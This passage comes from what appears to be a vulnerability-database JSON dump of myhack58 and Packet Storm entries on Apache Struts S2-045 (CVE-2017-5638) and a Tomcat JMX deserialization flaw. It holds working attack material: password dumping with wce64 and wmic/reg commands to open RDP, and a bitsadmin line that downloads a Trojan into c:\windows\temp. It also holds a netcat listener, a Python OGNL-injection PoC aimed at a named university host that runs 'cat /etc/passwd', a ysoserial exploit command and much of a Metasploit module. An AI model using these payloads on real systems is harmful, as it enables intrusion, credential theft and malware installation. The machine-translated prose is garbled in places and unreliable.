wce64, directly wce64 \u2013w to get the current login password, be sure to use administrator rights to execute. \n\uff082\uff09directly on 3389 \nIn the parameters were modified three times, execute the following code three times, you can open 3389. \nwmic /namespace:\\\\\\root\\cimv2\\terminalservices pathwin32_terminalservicesetting where (__CLASS != \"\") callsetallowtsconnections 1 \nwmic/namespace:\\\\\\root\\cimv2\\terminalservices path win32_tsgeneralsetting where(TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1 \nreg add\"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /vfSingleSessionPerUser /t REG_DWORD /d 0 /f \n3389 is open on the condition that the other party is independent of the IP, if it is within the network IP the case of the second method. \n2. The Trojan executes the law\n\uff081\uff09Download the Trojan\nFirst you need to prepare a Trojan program, you need to through win2008. Then modify the win. py in the whoami parameters: \nGermany /transfer myjob1/download /priority normal http://www.myhack58.com/ma.exe c:\\windows\\temp\\ma.exe \nma. exe save in www. myhack58. com web site root directory, it will download directly to the other party c:\\windows\\temp directory. \n\uff082\uff09the execution of the Trojan, to modify the poc in the whoami parameters for the ma. exe to the true path and the address, as follows. Run save after the poc is in the original implementation. \nc:\\windows\\temp\\ma.exe \n1.3. 4Linux under the rapid penetration of the ideas\n1. On a standalone server to perform monitoring, required in the independent IP on the server, execute\u201cnc \u2013vv\u2013l \u2013p 4433\u201d, you can perform the connection about this IP the 4433 port. For example, http://www. myhack58. com:4433, if the listening port has data, it indicates the normal, otherwise check the firewall rules. \n2. Perform poc \n\n\n**[1] [[2]](<84086_2.htm>) [[3]](<84086_3.htm>) [next](<84086_2.htm>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-03-08T00:00:00", "type": "myhack58", "title": "How fast the use of s02-45 vulnerability to gain server access-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-08T00:00:00", "id": "MYHACK58:62201784086", "href": "http://www.myhack58.com/Article/html/3/62/2017/84086.htm", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-03-07T09:25:04", "description": "! [](/Article/UploadPic/2017-3/201737152244987. png? www. myhack58. com) \nFreeBuf last exposure of the Struts 2 vulnerability is already more than six months ago. This vulnerability is a RCE remote code execution vulnerability. Simple to say, based on Jakarta Multipart resolver for file upload, exploit the vulnerability for remote code execution. The vulnerability by the constant information Nike Zheng reported. \nApache Struts is a United States Apache\uff08the Apache Software Foundation is responsible for the maintenance of an open source project, is used to create enterprise-class Java Web application open source MVC framework. \nVulnerability number\nCVE-2017-5638 \nVulnerability description\nThe Struts use the Jakarta parsing file upload request packet properly, when the remote attacker would construct a malicious Content-Type that could lead to remote command execution. \nIn fact in default. properties file, struts. multipart. parser of values there are two options, namely jakarta and pell in the original actually there is a third option cos it. Wherein the jakarta parser is the Struts 2 framework of the standard components. By default, jakarta is enabled, so the vulnerability of the seriousness of the need to get to grips with it. \nThe scope of the impact\nThe Struts 2.3.5 \u2013 Struts 2.3.31 \nThe Struts 2.5 \u2013 Struts 2.5.10 \nSolution\nIf you are using based on the Jakarta file upload Multipart resolver, please upgrade to Apache Struts 2.3. 32 or 2. 5. 10. 1 version; or you can switch to a different implementation of file upload Multipart resolver. \nVulnerability PoC \n#! /usr/bin/env python \n# encoding:utf-8 \nimport urllib2 \nimport sys \nfrom poster. encode import multipart_encode \nfrom poster. streaminghttp import register_openers \nheader1 ={ \n\"Host\":\"alumnus. shu. edu. cn\", \n\"Connection\":\"keep-alive\", \n\"Refer\":\"alumnus. shu. edu. cn\", \n\"Accept\":\"*/*\", \n\"X-Requested-With\":\"XMLHttpRequest\", \n\"Accept-Encoding\":\"deflate\", \n\"Accept-Language\":\"zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4\", \n} \ndef poc(): \nregister_openers() \ndatagen, headers = multipart_encode({\"image1\": open(\"tmp.txt\", \"rb\")}) \nheader[\"User-Agent\"]=\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36\" \nheader[\"Content-Type\"]=\"'%{(#nike,='multipart/form-data'). \n(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS). \n(#_memberAccess? (#_memberAccess=#dm): \n((#container=#context['com. opensymphony. xwork2. ActionContext. container']). \n(#ognlUtil=#container. getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)). \n(#ognlUtil. getExcludedPackageNames(). clear()). (#ognlUtil. getExcludedClasses(). clear()). \n(#context. setMemberAccess(#dm)))). (#cmd='cat /etc/passwd'). \n(#iswin=(@java.lang.System@getProperty('os. name'). toLowerCase(). contains('win'))). \n(#cmds=(#iswin? {'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})). \n(#p=new java. lang. ProcessBuilder(#cmds)). (#p. redirectErrorStream(true)). \n(#process=#p. start()). (#ros=(@org.apache.struts2.ServletActionContext@getResponse(). \ngetOutputStream())). (@org.apache.commons.io.IOUtils@copy(#process. getInputStream(),#ros)). \n(#ros. flush())}\"' \nrequest = urllib2. Request(str(sys. argv[1]),datagen,headers=header) \nresponse = urllib2. urlopen(request) \nprint the response. read() \n\npoc() \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-03-07T00:00:00", "type": "myhack58", "title": "Apache Struts2 exposure arbitrary code execution vulnerability (S2-045,CVE-2017-5638)-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-07T00:00:00", "id": "MYHACK58:62201784026", "href": "http://www.myhack58.com/Article/html/3/62/2017/84026.htm", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-07-10T13:31:12", "description": "0\u00d71 Overview \nMany business websites use the Apache open source project to build a http server, which is most of the use of the Apache sub-project of Struts in. But since the Apache Struts2 Product code there are more risks, beginning in 2007, Struts2 will frequently broke multiple high-risk vulnerabilities. \nFrom the Apache official data, from 2007 to 2018 total published number S2-001 to S2-056 total of 56 vulnerabilities, of which only a remote code execution vulnerability Remote Code Execution on a 9. \n! [](/Article/UploadPic/2018-7/2018710164555841. png? www. myhack58. com) \n2017 3 months was reported out of the S2-045\uff08CVE-2017-5638 high-risk vulnerabilities, based on Jakarta Multipart parser implementation file upload may lead to an RCE, the impact of the range of the Struts 2.3.5 \u2013 Struts 2.3.31, as well as the Struts 2.5 \u2013 Struts 2.5.10 version, persists to be utilized for an attack. \n2018 year 4 months Tencent Yu see Threat Intelligence Center had been monitoring the hacker group exploit this vulnerability bulk of the invasion[the web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>)implantation mining Trojan\uff08for more details, see the enterprise not fix Apache Struts 2 vulnerability-induced[Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>)is the bulk of the invasion article, the recent Royal to see the Threat Intelligence Center is again monitored a similar attack. \nThis attack, hackers use attack tools WinStr045 detecting the presence on the network vulnerability[web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>), found that the presence of vulnerability of the machine through a remote execution of various types of instruction provide the right to, create, account, system information gathering, and then will be used to download the Trojan mas. exe the implant, then the use of mas. exe this Trojan Downloader from the plurality of C&amp;C;address to download more Trojans: the \u5229\u7528\u63d0\u6743\u6728\u9a6co3/o6.exe and \u6316\u77ff\u6728\u9a6cnetxmr4.0.exe the. \nSince the bitcoin mining Trojan netxmr the decryption code after the module name\u201ckoi\u201dis loaded, therefore, Tencent Yu see Threat Intelligence Center will be named for KoiMiner it. Interestingly, intruders to ensure your mining success, it will check the system processes, CPU resource consumption, and if CPU usage exceeds 40%, it will be the end of the Run, will save the system resources for the mining of. \nAccording to the code traceability analysis, Tencent Yu see Threat Intelligence Center researchers believe that this KoiMiner series mining Trojan is probably some hacker forums, underground mining organizations to share in the community more people cooperation of the\u201cpractice\u201dworks. \n! [](/Article/UploadPic/2018-7/2018710164555994. png? www. myhack58. com) \nAttack process \nNote: Struts is based on MVC design pattern Web application framework, the user use of the framework can be business logic code from the presentation layer clearly separated, so as to focus on the business logic and the mapping relationship between the configuration file. Struts2 is Struts and WebWork combination, a combination of Struts and WebWork advantages, the use of interceptor mechanisms to process the user's request, so that business logic can with ServletAPI completely out of the opening. \n0\u00d72 a detailed analysis of the \n0 x 2.1 intrusion \nThe detection of the target system whether the presence of S2-045 vulnerability \n! [](/Article/UploadPic/2018-7/2018710164555176. png? www. myhack58. com) \nThe presence of the vulnerability of the system to attack \n! [](/Article/UploadPic/2018-7/2018710164555748. png? www. myhack58. com) \nInvasion tool for the selection of osmotic command \n! [](/Article/UploadPic/2018-7/2018710164555749. png? www. myhack58. com) \nThe invasion can be selected when execution of the command can also be self-defined,choose the command Windows, linux, penetration of commonly used commands, including viewing system version information, network connection status, port open status and add to the system with administrator privileges to the new user, open the remote connection service and other operations. \n! [](/Article/UploadPic/2018-7/2018710164555928. png? www. myhack58. com) \nThrough the directory view command to confirm C:\\Windows\\Help directory and C:\\ProgramData whether the directory has been implanted Trojan, if not then the mas. exe Trojan infection. The time of implantation to first create the C#code to text mas. cs, \u7136\u540e\u4f7f\u7528.NET\u7a0b\u5e8f\u5c06\u5176\u7f16\u8bd1\u4e3a\u53ef\u6267\u884c\u6587\u4ef6mas.exe the. \nFirst execute the command to create a mas. cs and write The for download code. \n! [](/Article/UploadPic/2018-7/2018710164555437. png? www. myhack58. com) \n\u7136\u540e\u6267\u884c\u547d\u4ee4\u5c06mas.cs\u901a\u8fc7.NET\u7a0b\u5e8f\u7f16\u8bd1\u4e3amas.exe the. \n! [](/Article/UploadPic/2018-7/2018710164555672. png? www. myhack58. com) \nCommand in the use of mas. exe download mining Trojan netxmr4. To 0. \n! [](/Article/UploadPic/2018-7/2018710164555433. png? www. myhack58. com) \nPart of the attack objectives are as follows: \n! [](/Article/UploadPic/2018-7/2018710164555651. jpg? www. myhack58. com) \nImplantation of mas. the exe size is only 4k,is stored in the directory ProgramData. From Yu see Threat Intelligence Center monitoring and recording can be seen, mas.exe\u4ece\u591a\u4e2aC2\u5730\u5740\u4e0b\u8f7d\u4e86netxmr4.exe(mining Trojan), the o3.exe/o6.exe(providing the right to Trojans)and other Trojans. \n! [](/Article/UploadPic/2018-7/2018710164555713. png? www. myhack58. com)\n\n**[1] [[2]](<90758_2.htm>) [[3]](<90758_3.htm>) [[4]](<90758_4.htm>) [next](<90758_2.htm>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2018-07-10T00:00:00", "type": "myhack58", "title": "Apache Struts2 high-risk vulnerabilities cause the Enterprise Server is the invasion mounted KoiMiner mining Trojan-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-07-10T00:00:00", "id": "MYHACK58:62201890758", "href": "http://www.myhack58.com/Article/html/3/62/2018/90758.htm", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-03T17:43:53", "description": "Background description\nTomcat is by Apache Software Foundation subordinate's Jakarta a project development Servlet vessel, in accordance with Sun Microsystems to provide the technical specifications, the realization of the Servlet and JavaServer Page\uff08JSP\uff09support, and provides as a[Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>)some unique functions, like Tomcat managed and controls the platform, secure domain management and the Tomcat valve and so on. Tomcat is very popular with the majority of programmers like it, because it runs out system resources occupied by small, scalable, support load balancing and Mail Service, etc. the development of the application system commonly used functions. \nVulnerability description\nOracle fixes JmxRemoteLifecycleListener deserialization Vulnerability(CVE-2016-3427)\u3002 Tomcat also uses the JmxRemoteLifecycleListener this listener,but the Tomcat did not timely upgrade, so there is this remote code execution vulnerability. \nAffected version: \nApache Tomcat 9.0.0. M1 to 9.0.0. M11 \nApache Tomcat 8.5.0 to 8.5.6 \nApache Tomcat 8.0.0. RC1 to 8.0.38 \nApache Tomcat 7.0.0 to 7.0.72 \nApache Tomcat 6.0.0 to 6.0.47 \n\nThe impact of the scene: \nZabbix 2.0 has been the JMX monitoring added to the system, itself, is no longer dependent on third-party tools. This is on a Tomcat application and other Java application monitoring easier. Herein, a simple description Zabbix use JMX to monitor Tomcat process. \nVulnerability verification code\uff08POC\uff09: \nTested version: tomcat version 8. 0. 36 \nconf/server. xml to increase the configuration, add the catalina-jmx-remote. jar package, modify the catalina configuration file\n! [](/Article/UploadPic/2016-12/2016123165437471. png? www. myhack58. com) \n! [](/Article/UploadPic/2016-12/2016123165437789. png? www. myhack58. com) \nF:\\HackTools\\EXP&gt;java-cp ysoserial-master-v0.0.4.jar ysoserial. exploit. RMIRegistryExploit localhost 10001 Groovy1 calc.exe \n! [](/Article/UploadPic/2016-12/2016123165437478. png? www. myhack58. com) \nThis vulnerability, there are other use posture, the harm is huge, so to change the JMX password authentication is very necessary! \nPatch code: \nDiff of /tomcat/trunk/webapps/docs/changelog.xml \n! [](http://mmbiz.qpic.cn/mmbiz_png?www.myhack58.com/kjV6I7ricq6PBVL3l6EL6f9c8SoI4wqMssZ6ib2jHichpQZPKzXxyC4OOV1BOduzZShTCllbIINUL8AJzyMcEPrAA/0?wx_fmt=png?www.myhack58.com) \nParent Directory | \n! [](http://mmbiz.qpic.cn/mmbiz_png?www.myhack58.com/kjV6I7ricq6PBVL3l6EL6f9c8SoI4wqMsxA7UdVzFs14K6cDMyEOpvxZpdRC7Mk3lxBGeicR22j3745Gv1Fp2y9Q/0?wx_fmt=png?www.myhack58.com) \nRevision Log | \n! [](http://mmbiz.qpic.cn/mmbiz_png?www.myhack58.com/kjV6I7ricq6PBVL3l6EL6f9c8SoI4wqMs9Lu69oUq1a4myu0Zq8iajeqm48FVkLlNRP0cfuyiaqNiclqg82Uyj4iayw/0?wx_fmt=png?www.myhack58.com) \nPatch \n\\--- tomcat/trunk/webapps/docs/changelog.xml 2016/11/02 11:57:28 1767643 \n+++ tomcat/trunk/webapps/docs/changelog.xml 2016/11/02 11:57:36 1767644 \n@@ -97,6 +97,10 @@ \nStoreConfig component includes the executor name when writing the \nThe Connector configuration. (markt) \n\n\\+ \n\\+ When configuring the JMX remote listener, specify the allowed types for \n\\+ the credentials. (markt) \n\\+ \n\n\n/tomcat/trunk/java/org/apache/catalina/mbeans/JmxRemoteLifecycleListener.java \n! [](http://mmbiz.qpic.cn/mmbiz_png?www.myhack58.com/kjV6I7ricq6PBVL3l6EL6f9c8SoI4wqMssZ6ib2jHichpQZPKzXxyC4OOV1BOduzZShTCllbIINUL8AJzyMcEPrAA/0?wx_fmt=png?www.myhack58.com) \nParent Directory | \n! [](http://mmbiz.qpic.cn/mmbiz_png?www.myhack58.com/kjV6I7ricq6PBVL3l6EL6f9c8SoI4wqMsxA7UdVzFs14K6cDMyEOpvxZpdRC7Mk3lxBGeicR22j3745Gv1Fp2y9Q/0?wx_fmt=png?www.myhack58.com) \nRevision Log | \n! [](http://mmbiz.qpic.cn/mmbiz_png?www.myhack58.com/kjV6I7ricq6PBVL3l6EL6f9c8SoI4wqMs9Lu69oUq1a4myu0Zq8iajeqm48FVkLlNRP0cfuyiaqNiclqg82Uyj4iayw/0?wx_fmt=png?www.myhack58.com) \nPatch \n\\--- tomcat/trunk/java/org/apache/catalina/mbeans/JmxRemoteLifecycleListener.java 2016/11/02 11:57:28 1767643 \n\n\n**[1] [[2]](<81747_2.htm>) [next](<81747_2.htm>)**\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2016-12-03T00:00:00", "type": "myhack58", "title": "Apache Tomcat multiple versions of a remote code execution CVE-2016-8735(POC)-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427"], "modified": "2016-12-03T00:00:00", "id": "MYHACK58:62201681747", "href": "http://www.myhack58.com/Article/html/3/62/2016/81747.htm", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-03-30T00:37:24", "description": "Through this article, we mainly learn how Apache Struts to achieve OGNL injection. Our examples will be set forth in the Struts of the two critical vulnerabilities: CVE-2017-5638\uff08Equifax information disclosure and CVE-2018-11776\u3002 \nApache Struts is a free open source framework for creating modern Java Web applications. Apache Struts has many serious vulnerabilities, one of its characteristics is to support OGNL object graph navigation language, which is also many loopholes is the main reason. \nOne vulnerability, CVE-2017-5638 directly leads to the 2017 Equifax information leakage, exposure to more than 1. 45 million US citizens personal information. Although the company's annual revenue more than 30 billion dollars, but they still did not escape the Apache Struts MVC framework of a known vulnerability attack. \nThis paper mainly introduces the Apache Struts, and then will guide us how to modify a simple application, the use of OGNL and achieve exploits. Next, we will study in depth the platform on a number of Public Exploit way, and try to use OGNL injection vulnerability. \nAlthough Java developers are familiar with Apache Struts, but the security community often does not do however, which is why we wrote this article for the reason. \nGetting started \nRunning a vulnerable Struts application need to install Apache Tomcat [Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>a). The package of the latest version can be downloaded here as a ZIP. The binary file decompress to a location of your choice we use/var/tomcat, and continues: \ncd /var/tomcat/bin # go to the unzipped folder \nchmod +x *. sh # set the script to executable file \n./ startup.sh # run the startup script \nOur visit to http://localhost:8080/, and check whether the site running. \nAfter the confirmation, we are ready to download the old version of the Apache Struts framework, which is vulnerable to our upcoming demo of the vulnerability attack. This page provides to meet our needs 2. 3. 30 version The Struts in. \nIn the extract compressed content, we should be in the/apps position seen under struts2-showcase. war file. This is one use of the Struts compiled and ready to deploy demo application. Just need the WAR file is copied to/var/tomcat/webapps, and access http://localhost:8080/struts2-showcase/showcase. action confirm whether it is valid. \n[Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>)the basics \nIf you have a good grasp of the Java Web applications related to simple concepts such as Servlets, then you would have been leading. If you are new to the Java Servlet knows nothing about, it can be understood simply as a component, its purpose is to create for in the[Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>)hosted on Web applications the Web container, in addition, it is also responsible for the processing of the/struts2-showcase and other Java applications request. \nTo the processing Servlet, the[Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>), for example Apache Tomcat requires some Assembly: \n1\\. Apache Coyote is to support the HTTP/1.1 Protocol connector. It allows the Servlet container components of Apache Catalina to communicate. \n2\\. Apache Catalina container when determined in the Tomcat receives an HTTP request, you need to call which the Servlet container. It will also HTTP request and response from the text is converted to a Servlet using a Java object. \n! [](/Article/UploadPic/2019-3/201933032655612. png) \nHere you can find information about the Java Servlet specification for all the details of the latest version 4. 0 in. \nApache Struts basics \nWith Java Web applications using the Apache Struts Framework application can have multiple Servlet. This article's main purpose is not to let everyone understand this to build the Web application framework, but on the surface the hang of the basic concepts. We can step-by-step tutorial on the subject. \nThe Apache Struts framework relies on MVC model-View-Controller architecture pattern. IT application very helpful, because you can separate the main application components: \n1\\. Model: represents the application data, for example, using\u201corders\u201dand other data of the class. \n2\\. View: is the output of the application, the visual part. \n3\\. The controller: receiving a user input, using the model to generate the view. \n4\\. Action Actions: the Apache Struts in the model. \n5\\. Intercept the Interceptors: the part of the controller, they can be in processing the request before or after the invocation of the hook. \n6\\. Value stack/OGNL: a set of objects, for example, model or action object. \n7\\. Result/result type: used to select business logic view. \n8\\. View of technology: the processing of data display. \nYou can see below the Apache Struts Web application General architecture: \n! [](/Article/UploadPic/2019-3/201933032655347.jpg) \nController receives the HTTP request, the FilterDispatcher is responsible for according to the request to invoke the right Operation. And then perform the operation, the view component is ready for a result and sends it to the HTTP response in the user. \nStruts application example \nYou want to start from scratch to write a Struts application takes some time, so we will use an already available rest-showcase demo application, which is a basic front-end a simple REST API. To compile the application, we only need to go into its directory and use Maven to compile: \ncd struts-2.3.30/src/apps/rest-showcase/ \nmvn package \nIn the target directory, we can find the following files: struts2-rest-showcase. war. You can copy it to the Tomcat server's webapps directory, for example:/var/tomcat/webapps to install it. \nThe following is the application source code: \n! [](/Article/UploadPic/2019-3/201933032655780. png) \nThe following are the available file description: \n1\\. Order. java is model, which is a storing order information of a Java class. \npublic class Order { \nString id; \nString clientName; \nint amount; \n... \n} \n2\\. OrdersService. java is a Helper class, which will be the Orders stored in the HashMap of the total, and its management. \npublic class OrdersService { \n\n\n**[1] [[2]](<93410_2.htm>) [[3]](<93410_3.htm>) [[4]](<93410_4.htm>) [[5]](<93410_5.htm>) [[6]](<93410_6.htm>) [next](<93410_2.htm>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2019-03-30T00:00:00", "type": "myhack58", "title": "Apache Struts OGNL injection vulnerability principle with an example-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776"], "modified": "2019-03-30T00:00:00", "id": "MYHACK58:62201993410", "href": "http://www.myhack58.com/Article/html/3/62/2019/93410.htm", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2017-03-15T01:15:35", "description": "", "cvss3": {}, "published": "2017-03-14T00:00:00", "type": "packetstorm", "title": "Apache Struts Jakarta Multipart Parser OGNL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-14T00:00:00", "id": "PACKETSTORM:141630", "href": "https://packetstormsecurity.com/files/141630/Apache-Struts-Jakarta-Multipart-Parser-OGNL-Injection.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache Struts Jakarta Multipart Parser OGNL Injection', \n'Description' => %q{ \nThis module exploits a remote code execution vunlerability in Apache Struts \nversion 2.3.5 - 2.3.31, and 2.5 - 2.5.10. Remote Code Execution can be performed \nvia http Content-Type header. \n \nNative payloads will be converted to executables and dropped in the \nserver's temp dir. If this fails, try a cmd/* payload, which won't \nhave to write to the disk. \n}, \n'Author' => [ \n'Nike.Zheng', # PoC \n'Nixawk', # Metasploit module \n'Chorder', # Metasploit module \n'egypt', # combining the above \n'Jeffrey Martin', # Java fu \n], \n'References' => [ \n['CVE', '2017-5638'], \n['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-045'] \n], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Universal', { \n'Platform' => %w{ unix windows linux }, \n'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ], \n}, \n], \n], \n'DisclosureDate' => 'Mar 07 2017', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptString.new('TARGETURI', [ true, 'The path to a struts application action', '/struts2-showcase/' ]), \n] \n) \nregister_advanced_options( \n[ \nOptString.new('HTTPMethod', [ true, 'The HTTP method to send in the request. Cannot contain spaces', 'GET' ]) \n] \n) \n \n@data_header = \"X-#{rand_text_alpha(4)}\" \nend \n \ndef check \nvar_a = rand_text_alpha_lower(4) \n \nognl = \"\" \nognl << %q|(#os=@java.lang.System@getProperty('os.name')).| \nognl << %q|(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('|+var_a+%q|', #os))| \n \nbegin \nresp = send_struts_request(ognl) \nrescue Msf::Exploit::Failed \nreturn Exploit::CheckCode::Unknown \nend \n \nif resp && resp.code == 200 && resp.headers[var_a] \nvprint_good(\"Victim operating system: #{resp.headers[var_a]}\") \nExploit::CheckCode::Vulnerable \nelse \nExploit::CheckCode::Safe \nend \nend \n \ndef exploit \ncase payload.arch.first \n#when ARCH_JAVA \n# datastore['LHOST'] = nil \n# resp = send_payload(payload.encoded_jar) \nwhen ARCH_CMD \nresp = execute_command(payload.encoded) \nelse \nresp = send_payload(generate_payload_exe) \nend \n \nrequire'pp' \npp resp.headers if resp \nend \n \ndef send_struts_request(ognl, extra_header: '') \nuri = normalize_uri(datastore[\"TARGETURI\"]) \ncontent_type = \"%{(#_='multipart/form-data').\" \ncontent_type << \"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).\" \ncontent_type << \"(#_memberAccess?\" \ncontent_type << \"(#_memberAccess=#dm):\" \ncontent_type << \"((#container=#context['com.opensymphony.xwork2.ActionContext.container']).\" \ncontent_type << \"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).\" \ncontent_type << \"(#ognlUtil.getExcludedPackageNames().clear()).\" \ncontent_type << \"(#ognlUtil.getExcludedClasses().clear()).\" \ncontent_type << \"(#context.setMemberAccess(#dm)))).\" \ncontent_type << ognl \ncontent_type << \"}\" \n \nheaders = { 'Content-Type' => content_type } \nif extra_header \nheaders[@data_header] = extra_header \nend \n \n#puts content_type.gsub(\").\", \").\\n\") \n#puts \n \nresp = send_request_cgi( 